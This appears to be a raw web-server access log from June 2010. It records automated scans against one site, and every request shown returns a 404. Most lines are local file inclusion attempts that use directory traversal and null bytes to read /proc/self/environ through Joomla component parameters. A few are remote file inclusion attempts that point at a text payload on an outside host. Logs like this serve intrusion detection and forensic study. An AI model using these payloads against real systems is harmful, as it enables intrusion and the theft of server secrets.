122.252.7.141 - - [13/Jun/2010:08:25:31 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:25:32 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
94.23.6.211 - - [13/Jun/2010:08:25:33 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:33 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:34 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:25:34 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:26:14 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:26:14 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.26.184 - - [13/Jun/2010:08:27:24 -0500] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:27:24 -0500] "GET //Neos_Chronos/header.php?base_folder=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
91.121.26.184 - - [13/Jun/2010:08:27:24 -0500] "GET /logs/access_log.1271548800//Neos_Chronos/header.php?base_folder=http://www.pyungsan.or.kr/bbs/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
219.240.36.36 - - [13/Jun/2010:08:27:44 -0500] "GET /logs/access_log.1274227200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
94.23.6.211 - - [13/Jun/2010:08:27:54 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:27:54 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:27:54 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:27:54 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:01 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:01 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:01 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:01 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:24 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:25 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:34 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:34 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:28:36 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:28:37 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:28:38 -0500] "GET /logs//index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:28:38 -0500] "GET //index.php?option=com_travelbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:28:39 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
188.72.70.56 - - [13/Jun/2010:08:28:45 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
188.72.70.56 - - [13/Jun/2010:08:28:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
188.72.70.56 - - [13/Jun/2010:08:28:46 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:35 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
83.125.73.41 - - [13/Jun/2010:08:29:37 -0500] "GET /logs/access_log.1274832000///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:29:38 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:29:38 -0500] "GET /logs///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
94.23.6.211 - - [13/Jun/2010:08:29:38 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:41 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:41 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:47 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:29:50 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:29:50 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:29:50 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:29:52 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:29:53 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:30:04 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.197.156 - - [13/Jun/2010:08:30:04 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
189.108.172.26 - - [13/Jun/2010:08:30:09 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:10 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:10 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
95.131.67.183 - - [13/Jun/2010:08:30:15 -0500] "GET /logs/access_log.1274832000///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
95.131.67.183 - - [13/Jun/2010:08:30:15 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
95.131.67.183 - - [13/Jun/2010:08:30:15 -0500] "GET /logs///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
189.108.172.26 - - [13/Jun/2010:08:30:18 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:19 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:19 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:19 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:20 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:20 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:20 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:20 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:21 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
83.125.73.41 - - [13/Jun/2010:08:30:23 -0500] "GET /logs/access_log.1274832000///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:30:24 -0500] "GET ///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
83.125.73.41 - - [13/Jun/2010:08:30:24 -0500] "GET /logs///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.805"
189.108.172.26 - - [13/Jun/2010:08:30:25 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:25 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:26 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:26 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:27 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:27 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:28 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:29 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:29 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:30 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:30 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:31 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:31 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:32 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:32 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:41 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:41 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:42 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
122.252.7.141 - - [13/Jun/2010:08:30:55 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:30:56 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
189.108.172.26 - - [13/Jun/2010:08:30:56 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
83.125.73.41 - - [13/Jun/2010:08:30:57 -0500] "GET /logs/access_log.1274572800///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.805"
189.108.172.26 - - [13/Jun/2010:08:30:57 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:30:57 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:31:01 -0500] "GET /logs/access_log.1274832000/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 376 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:31:02 -0500] "GET /lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 349 "-""libwww-perl/5.808"
189.108.172.26 - - [13/Jun/2010:08:31:02 -0500] "GET /logs/lfi../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 354 "-""libwww-perl/5.808"
94.23.6.211 - - [13/Jun/2010:08:31:04 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.6.211 - - [13/Jun/2010:08:31:04 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
122.201.90.71 - - [13/Jun/2010:08:31:18 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
122.201.90.71 - - [13/Jun/2010:08:31:18 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.823"
122.201.90.71 - - [13/Jun/2010:08:31:19 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
122.201.90.71 - - [13/Jun/2010:08:31:19 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.823"
122.252.7.141 - - [13/Jun/2010:08:31:20 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.252.7.141 - - [13/Jun/2010:08:31:20 -0500] "GET //index.php?option=com_tweetla&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
95.131.67.183 - - [13/Jun/2010:08:31:35 -0500] "GET /logs/access_log.1274572800///index.php?language_home=&rootdp=zZz&gsLanguage=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
122.201.90.71 - - [13/Jun/2010:08:31:40 -0500] "GET /logs//index.php?option=com_tweetla&controller=../../../../../../../../../../../../